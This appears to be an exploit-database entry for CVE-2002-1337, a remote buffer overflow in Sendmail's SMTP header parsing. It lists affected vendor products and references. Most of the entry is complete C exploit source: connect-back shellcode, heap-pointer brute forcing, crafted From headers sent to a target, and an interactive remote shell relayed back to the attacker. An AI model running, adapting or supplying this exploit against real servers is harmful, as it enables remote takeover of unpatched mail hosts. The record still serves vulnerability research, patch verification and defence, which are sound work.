ID
VAR-E-200303-0036
CVE
cve_id: | CVE-2002-1337 | Trust: 1.9 |
EDB ID
22313
TITLE
Sendmail 8.12.x - Header Processing Buffer Overflow (1) - Unix remote Exploit
Trust: 0.6
DESCRIPTION
Sendmail 8.12.x - Header Processing Buffer Overflow (1). CVE-2002-1337CVE-4502 . remote exploit for Unix platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | sendmail | model: | - | scope: | eq | version: | 8.12.x | Trust: 1.0 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 11.04 | Trust: 0.6 |
vendor: | wind | model: | river systems platform sa | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | wind | model: | river systems bsd/os | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | wind | model: | river systems bsd/os | scope: | eq | version: | 4.3.1 | Trust: 0.3 |
vendor: | wind | model: | river systems bsd/os | scope: | eq | version: | 4.2 | Trust: 0.3 |
vendor: | sun | model: | solaris 9 x86 | scope: | - | version: | - | Trust: 0.3 |
vendor: | sun | model: | solaris | scope: | eq | version: | 9 | Trust: 0.3 |
vendor: | sun | model: | solaris 8 x86 | scope: | - | version: | - | Trust: 0.3 |
vendor: | sun | model: | solaris 8 sparc | scope: | - | version: | - | Trust: 0.3 |
vendor: | sun | model: | solaris 7.0 x86 | scope: | - | version: | - | Trust: 0.3 |
vendor: | sun | model: | solaris | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | sun | model: | solaris 2.6 x86 | scope: | - | version: | - | Trust: 0.3 |
vendor: | sun | model: | solaris | scope: | eq | version: | 2.6 | Trust: 0.3 |
vendor: | sun | model: | lx50 | scope: | - | version: | - | Trust: 0.3 |
vendor: | sun | model: | cobalt raq xtr | scope: | - | version: | - | Trust: 0.3 |
vendor: | sun | model: | cobalt raq | scope: | eq | version: | 550 | Trust: 0.3 |
vendor: | sun | model: | cobalt raq | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | sun | model: | cobalt raq | scope: | eq | version: | 3 | Trust: 0.3 |
vendor: | sun | model: | cobalt qube | scope: | eq | version: | 3 | Trust: 0.3 |
vendor: | sun | model: | cobalt manageraq3 3000r-mr | scope: | - | version: | - | Trust: 0.3 |
vendor: | sun | model: | cobalt cacheraq | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.19 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.18 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.17 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.16 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.15 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.14 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.13 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.12 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.11 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.10 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.9 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.8 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.7 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.6 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.5 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.4 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.3 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.2 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.1 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5 | Trust: 0.3 |
vendor: | sgi | model: | freeware | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 3.0.2 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.2.4 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.2.3 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.2.2 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.2.1 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.1.4 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.1.3 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.1.2 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.1.1 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail for nt | scope: | eq | version: | 3.0.2 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail for nt | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail for nt | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail for nt | scope: | eq | version: | 2.6.1 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail for nt | scope: | eq | version: | 2.6 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail advanced message server | scope: | eq | version: | 1.3 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail advanced message server | scope: | eq | version: | 1.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 3.0.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.2.4 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.2.3 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.2.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.2.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.1.4 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.1.3 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.1.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.1.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail for nt | scope: | eq | version: | 3.0.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail for nt | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail for nt | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail for nt | scope: | eq | version: | 2.6.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail for nt | scope: | eq | version: | 2.6 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.12.7 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.12.6 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.12.5 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.12.4 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.12.3 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.12.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.12.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail beta7 | scope: | eq | version: | 8.12 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail beta5 | scope: | eq | version: | 8.12 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail beta16 | scope: | eq | version: | 8.12 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail beta12 | scope: | eq | version: | 8.12 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail beta10 | scope: | eq | version: | 8.12 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.12.0 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.11.6 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.11.5 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.11.4 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.11.3 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.11.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.11.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.11 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.10.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.10.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.10 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.9.3 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.9.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.9.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.9.0 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.8.8 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 5.65 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 5.61 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 5.59 | Trust: 0.3 |
vendor: | sco | model: | unixware | scope: | eq | version: | 7.1.3 | Trust: 0.3 |
vendor: | sco | model: | unixware | scope: | eq | version: | 7.1.1 | Trust: 0.3 |
vendor: | sco | model: | open unix | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.6 | Trust: 0.3 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.5.3 | Trust: 0.3 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.5.2 | Trust: 0.3 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.5.1 | Trust: 0.3 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.5 | Trust: 0.3 |
vendor: | ibm | model: | z/os v1r4 | scope: | - | version: | - | Trust: 0.3 |
vendor: | ibm | model: | z/os v1r2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | ibm | model: | os/390 v2r8 | scope: | - | version: | - | Trust: 0.3 |
vendor: | ibm | model: | os/390 v2r10 | scope: | - | version: | - | Trust: 0.3 |
vendor: | ibm | model: | mvs | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | mpe/ix | scope: | eq | version: | 6.5 | Trust: 0.3 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 11.22 | Trust: 0.3 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 11.11 | Trust: 0.3 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.20 | Trust: 0.3 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.10 | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.22 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.11 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.04 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.00 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | alphaserver sc | scope: | - | version: | - | Trust: 0.3 |
vendor: | gentoo | model: | linux rc2 | scope: | eq | version: | 1.4 | Trust: 0.3 |
vendor: | gentoo | model: | linux rc1 | scope: | eq | version: | 1.4 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.7 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.6 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | ne | version: | 6.5.20 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | ne | version: | 3.0.3 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | ne | version: | 2.2.5 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | ne | version: | 2.1.5 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail for nt | scope: | ne | version: | 3.0.3 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail for nt | scope: | ne | version: | 2.6.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | ne | version: | 3.0.3 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | ne | version: | 2.2.5 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | ne | version: | 2.1.5 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail for nt | scope: | ne | version: | 3.0.3 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail for nt | scope: | ne | version: | 2.6.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | ne | version: | 8.12.8 | Trust: 0.3 |
vendor: | openwall | model: | gnu/*/linux | scope: | ne | version: | 1.0 | Trust: 0.3 |
vendor: | juniper | model: | networks junos | scope: | ne | version: | 5.1 | Trust: 0.3 |
vendor: | juniper | model: | networks junos | scope: | ne | version: | 5.0 | Trust: 0.3 |
EXPLOIT
// source: https://www.securityfocus.com/bid/6991/info
Sendmail is prone to a remotely buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers.
Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid.
Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree.
/*## copyright LAST STAGE OF DELIRIUM mar 2003 poland *://lsd-pl.net/ #*/
/*## sendmail 8.11.6 #*/
/* proof of concept code for remote sendmail vulnerability */
/* usage: linx86_sendmail target [-l localaddr] [-b localport] [-p ptr] */
/* [-c count] [-t timeout] [-v 80] */
/* where: */
/* target - address of the target host to run this code against */
/* localaddr - address of the host you are running this code from */
/* localport - local port that will listen for shellcode connection */
/* ptr - base ptr of the sendmail buffer containing our arbitrary data */
/* count - brute force loop counter */
/* timeout - select call timeout while waiting for shellcode connection */
/* v - version of the target OS (currently only Slackware 8.0 is supported) */
/* */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#define NOP 0xf8
#define MAXLINE 2048
#define PNUM 12
#define OFF1 (288+156-12)
#define OFF2 (1088+288+156+20+48)
#define OFF3 (139*2)
int tab[]={23,24,25,26};
#define IDX2PTR(i) (PTR+i-OFF1)
#define ALLOCBLOCK(idx,size) memset(&lookup[idx],1,size)
#define NOTVALIDCHAR(c) (((c)==0x00)||((c)==0x0d)||((c)==0x0a)||((c)==0x22)||\
(((c)&0x7f)==0x24)||(((c)>=0x80)&&((c)<0xa0)))
#define AOFF 33
#define AMSK 38
#define POFF 48
#define PMSK 53
char* lookup=NULL;
int gfirst;
char shellcode[]= /* 116 bytes */
"\xeb\x02" /* jmp <shellcode+4> */
"\xeb\x08" /* jmp <shellcode+12> */
"\xe8\xf9\xff\xff\xff" /* call <shellcode+2> */
"\xcd\x7f" /* int $0x7f */
"\xc3" /* ret */
"\x5f" /* pop %edi */
"\xff\x47\x01" /* incl 0x1(%edi) */
"\x31\xc0" /* xor %eax,%eax */
"\x50" /* push %eax */
"\x6a\x01" /* push $0x1 */
"\x6a\x02" /* push $0x2 */
"\x54" /* push %esp */
"\x59" /* pop %ecx */
"\xb0\x66" /* mov $0x66,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\x43" /* inc %ebx */
"\xff\xd7" /* call *%edi */
"\xba\xff\xff\xff\xff" /* mov $0xffffffff,%edx */
"\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */
"\x31\xca" /* xor %ecx,%edx */
"\x52" /* push %edx */
"\xba\xfd\xff\xff\xff" /* mov $0xfffffffd,%edx */
"\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */
"\x31\xca" /* xor %ecx,%edx */
"\x52" /* push %edx */
"\x54" /* push %esp */
"\x5e" /* pop %esi */
"\x6a\x10" /* push $0x10 */
"\x56" /* push %esi */
"\x50" /* push %eax */
"\x50" /* push %eax */
"\x5e" /* pop %esi */
"\x54" /* push %esp */
"\x59" /* pop %ecx */
"\xb0\x66" /* mov $0x66,%al */
"\x6a\x03" /* push $0x3 */
"\x5b" /* pop %ebx */
"\xff\xd7" /* call *%edi */
"\x56" /* push %esi */
"\x5b" /* pop %ebx */
"\x31\xc9" /* xor %ecx,%ecx */
"\xb1\x03" /* mov $0x3,%cl */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x3f" /* mov $0x3f,%al */
"\x49" /* dec %ecx */
"\xff\xd7" /* call *%edi */
"\x41" /* inc %ecx */
"\xe2\xf6" /* loop <shellcode+81> */
"\x31\xc0" /* xor %eax,%eax */
"\x50" /* push %eax */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x54" /* push %esp */
"\x5b" /* pop %ebx */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x54" /* push %esp */
"\x59" /* pop %ecx */
"\x31\xd2" /* xor %edx,%edx */
"\xb0\x0b" /* mov $0xb,%al */
"\xff\xd7" /* call *%edi */
;
int PTR,MPTR=0xbfffa01c;
void putaddr(char* p,int i) {
*p++=(i&0xff);
*p++=((i>>8)&0xff);
*p++=((i>>16)&0xff);
*p++=((i>>24)&0xff);
}
void sendcommand(int sck,char *data,char resp) {
char buf[1024];
int i;
if (send(sck,data,strlen(data),0)<0) {
perror("error");exit(-1);
}
if (resp) {
if ((i=recv(sck,buf,sizeof(buf),0))<0) {
perror("error");exit(-1);
}
buf[i]=0;
printf("%s",buf);
}
}
int rev(int a){
int i=1;
if((*(char*)&i)) return(a);
return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24);
}
void initlookup() {
int i;
if (!(lookup=(char*)malloc(MAXLINE))) {
printf("error: malloc\n");exit(-1);
}
ALLOCBLOCK(0,MAXLINE);
memset(lookup+OFF1,0,OFF2-OFF1);
for(i=0;i<sizeof(tab)/4;i++)
ALLOCBLOCK(OFF1+4*tab[i],4);
gfirst=1;
}
int validaddr(int addr) {
unsigned char buf[4],c;
int i,*p=(int*)buf;
*p=addr;
for(i=0;i<4;i++) {
c=buf[i];
if (NOTVALIDCHAR(c)) return 0;
}
return 1;
}
int freeblock(int idx,int size) {
int i,j;
for(i=j=0;i<size;i++) {
if (!lookup[idx+i]) j++;
}
return (i==j);
}
int findblock(int addr,int size,int begin) {
int i,j,idx,ptr;
ptr=addr;
if (begin) {
idx=OFF1+addr-PTR;
while(1) {
while(((!validaddr(ptr))||lookup[idx])&&(idx<OFF2)) {
idx+=4;
ptr+=4;
}
if (idx>=OFF2) return 0;
if (freeblock(idx,size)) return idx;
idx+=4;
ptr+=4;
}
} else {
idx=addr-PTR;
while(1) {
while(((!validaddr(ptr))||lookup[idx])&&(idx>OFF1)) {
idx-=4;
ptr-=4;
}
if (idx<OFF1) return 0;
if (freeblock(idx,size)) return idx;
idx-=4;
ptr-=4;
}
}
}
int findsblock(int sptr) {
int optr,sidx,size;
size=gfirst ? 0x2c:0x04;
optr=sptr;
while(sidx=findblock(sptr,size,1)) {
sptr=IDX2PTR(sidx);
if (gfirst) {
if (validaddr(sptr)) {
ALLOCBLOCK(sidx,size);
break;
} else sptr=optr;
} else {
if (validaddr(sptr-0x18)&&freeblock(sidx-0x18,4)&&freeblock(sidx+0x0c,4)&&
freeblock(sidx+0x10,4)&&freeblock(sidx-0x0e,4)) {
ALLOCBLOCK(sidx-0x18,4);
ALLOCBLOCK(sidx-0x0e,2);
ALLOCBLOCK(sidx,4);
ALLOCBLOCK(sidx+0x0c,4);
ALLOCBLOCK(sidx+0x10,4);
sidx-=0x18;
break;
} else sptr=optr;
}
sptr+=4;
optr=sptr;
}
gfirst=0;
return sidx;
}
int findfblock(int fptr,int i1,int i2,int i3) {
int fidx,optr;
optr=fptr;
while(fidx=findblock(fptr,4,0)) {
fptr=IDX2PTR(fidx);
if (validaddr(fptr-i2)&&validaddr(fptr-i2-i3)&&freeblock(fidx-i3,4)&&
freeblock(fidx-i2-i3,4)&&freeblock(fidx-i2-i3+i1,4)) {
ALLOCBLOCK(fidx,4);
ALLOCBLOCK(fidx-i3,4);
ALLOCBLOCK(fidx-i2-i3,4);
ALLOCBLOCK(fidx-i2-i3+i1,4);
break;
} else fptr=optr;
fptr-=4;
optr=fptr;
}
return fidx;
}
void findvalmask(char* val,char* mask,int len) {
int i;
unsigned char c,m;
for(i=0;i<len;i++) {
c=val[i];
m=0xff;
while(NOTVALIDCHAR(c^m)||NOTVALIDCHAR(m)) m--;
val[i]=c^m;
mask[i]=m;
}
}
void initasmcode(char *addr,int port) {
char abuf[4],amask[4],pbuf[2],pmask[2];
char name[256];
struct hostent *hp;
int i;
if (!addr) gethostname(name,sizeof(name));
else strcpy(name,addr);
if ((i=inet_addr(name))==-1) {
if ((hp=gethostbyname(name))==NULL) {
printf("error: address\n");exit(-1);
}
memcpy(&i,hp->h_addr,4);
}
putaddr(abuf,rev(i));
pbuf[0]=(port>>8)&0xff;
pbuf[1]=(port)&0xff;
findvalmask(abuf,amask,4);
findvalmask(pbuf,pmask,2);
memcpy(&shellcode[AOFF],abuf,4);
memcpy(&shellcode[AMSK],amask,4);
memcpy(&shellcode[POFF],pbuf,2);
memcpy(&shellcode[PMSK],pmask,2);
}
int main(int argc,char **argv){
int sck,srv,i,j,cnt,jidx,aidx,sidx,fidx,aptr,sptr,fptr,ssize,fsize,jmp;
int c,l,i1,i2,i3,i4,found,vers=80,count=256,timeout=1,port=25;
fd_set readfs;
struct timeval t;
struct sockaddr_in address;
struct hostent *hp;
char buf[4096],cmd[4096];
char *p,*host,*myhost=NULL;
printf("copyright LAST STAGE OF DELIRIUM mar 2003 poland //lsd-pl.net/\n");
printf("sendmail 8.11.6 for Slackware 8.0 x86\n\n");
if (argc<3) {
printf("usage: %s target [-l localaddr] [-b localport] [-p ptr] [-c count] [-t timeout] [-v 80]\n",argv[0]);
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"b:c:l:p:t:v:"))!=-1) {
switch(c) {
case 'b': port=atoi(optarg);break;
case 'c': count=atoi(optarg);break;
case 'l': myhost=optarg;break;
case 't': timeout=atoi(optarg);break;
case 'v': vers=atoi(optarg);break;
case 'p': sscanf(optarg,"%x",&MPTR);
}
}
host=argv[1];
srv=socket(AF_INET,SOCK_STREAM,0);
bzero(&address,sizeof(address));
address.sin_family=AF_INET;
address.sin_port=htons(port);
if (bind(srv,(struct sockaddr*)&address,sizeof(address))==-1) {
printf("error: bind\n");exit(-1);
}
if (listen(srv,10)==-1) {
printf("error: listen\n");exit(-1);
}
initasmcode(myhost,port);
for(i4=0;i4<count;i4++,MPTR+=cnt*4) {
PTR=MPTR;
sck=socket(AF_INET,SOCK_STREAM,0);
bzero(&address,sizeof(address));
address.sin_family=AF_INET;
address.sin_port=htons(25);
if ((address.sin_addr.s_addr=inet_addr(host))==-1) {
if ((hp=gethostbyname(host))==NULL) {
printf("error: address\n");exit(-1);
}
memcpy(&address.sin_addr.s_addr,hp->h_addr,4);
}
if (connect(sck,(struct sockaddr*)&address,sizeof(address))==-1) {
printf("error: connect\n");exit(-1);
}
initlookup();
sendcommand(sck,"helo yahoo.com\n",0);
sendcommand(sck,"mail from: anonymous@yahoo.com\n",0);
sendcommand(sck,"rcpt to: lp\n",0);
sendcommand(sck,"data\n",0);
aidx=findblock(PTR,PNUM*4,1);
ALLOCBLOCK(aidx,PNUM*4);
aptr=IDX2PTR(aidx);
printf(".");fflush(stdout);
jidx=findblock(PTR,strlen(shellcode)+PNUM*4,1);
ALLOCBLOCK(jidx,strlen(shellcode)+PNUM*4);
switch(vers) {
case 80: l=28;i1=0x46;i2=0x94;i3=0x1c;break;
default: exit(-1);
}
i2-=8;
p=buf;
for(i=0;i<138;i++) {
*p++='<';*p++='>';
}
*p++='(';
for(i=0;i<l;i++) *p++=NOP;
*p++=')';
*p++=0;
putaddr(&buf[OFF3+l],aptr);
sprintf(cmd,"From: %s\n",buf);
sendcommand(sck,cmd,0);
sendcommand(sck,"Subject: hello\n",0);
memset(cmd,NOP,MAXLINE);
cmd[MAXLINE-2]='\n';
cmd[MAXLINE-1]=0;
cnt=0;
while(cnt<PNUM) {
sptr=aptr;
fptr=IDX2PTR(OFF2);
if (!(sidx=findsblock(sptr))) break;
sptr=IDX2PTR(sidx);
if (!(fidx=findfblock(fptr,i1,i2,i3))) break;
fptr=IDX2PTR(fidx);
jmp=IDX2PTR(jidx);
while (!validaddr(jmp)) jmp+=4;
putaddr(&cmd[aidx],sptr);
putaddr(&cmd[sidx+0x24],aptr);
putaddr(&cmd[sidx+0x28],aptr);
putaddr(&cmd[sidx+0x18],fptr-i2-i3);
putaddr(&cmd[fidx-i2-i3],0x01010101);
putaddr(&cmd[fidx-i2-i3+i1],0xfffffff8);
putaddr(&cmd[fidx-i3],fptr-i3);
putaddr(&cmd[fidx],jmp);
aidx+=4;
PTR-=4;
cnt++;
}
p=&cmd[jidx+4*PNUM];
for(i=0;i<strlen(shellcode);i++) {
*p++=shellcode[i];
}
sendcommand(sck,cmd,0);
sendcommand(sck,"\n",0);
sendcommand(sck,".\n",0);
free(lookup);
FD_ZERO(&readfs);
FD_SET(0,&readfs);
FD_SET(srv,&readfs);
t.tv_sec=timeout;
t.tv_usec=0;
if (select(srv+1,&readfs,NULL,NULL,&t)>0) {
close(sck);
found=1;
if ((sck=accept(srv,(struct sockaddr*)&address,&l))==-1) {
printf("error: accept\n");exit(-1);
}
close(srv);
printf("\nbase 0x%08x mcicache 0x%08x\n",PTR,aptr);
write(sck,"/bin/uname -a\n",14);
} else {
close(sck);
found=0;
}
while(found){
FD_ZERO(&readfs);
FD_SET(0,&readfs);
FD_SET(sck,&readfs);
if(select(sck+1,&readfs,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&readfs)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else {printf("koniec\n");exit(-1);}
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&readfs)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else {printf("koniec\n");exit(-1);}
}
write(1,buf,cnt);
}
}
}
}
}
Trust: 1.0
EXPLOIT LANGUAGE
c
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Header Processing Buffer Overflow (1)
Trust: 1.0
CREDITS
Last Stage of Delirium
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2002-1337 | Trust: 1.9 |
db: | EXPLOIT-DB | id: | 22313 | Trust: 1.9 |
db: | BID | id: | 6991 | Trust: 1.9 |
db: | EDBNET | id: | 44505 | Trust: 0.6 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2002-1337 | Trust: 1.6 |
url: | https://www.securityfocus.com/bid/6991/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/22313/ | Trust: 0.6 |
url: | http://www-1.ibm.com/services/continuity/recover1.nsf/mss/mss-oar-e01-2003.0794.1 | Trust: 0.3 |
url: | http://www.slackware.org/lists/archive/viewer.php?l=slackware-security&y=2003&m=slackware-security.286398 | Trust: 0.3 |
url: | http://ftp.support.compaq.com/patches/public/readmes/unix/t64v51ab21-c0103500-17099-es-20030226.readme | Trust: 0.3 |
url: | http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/51181 | Trust: 0.3 |
url: | http://www.sendmail.org/ | Trust: 0.3 |
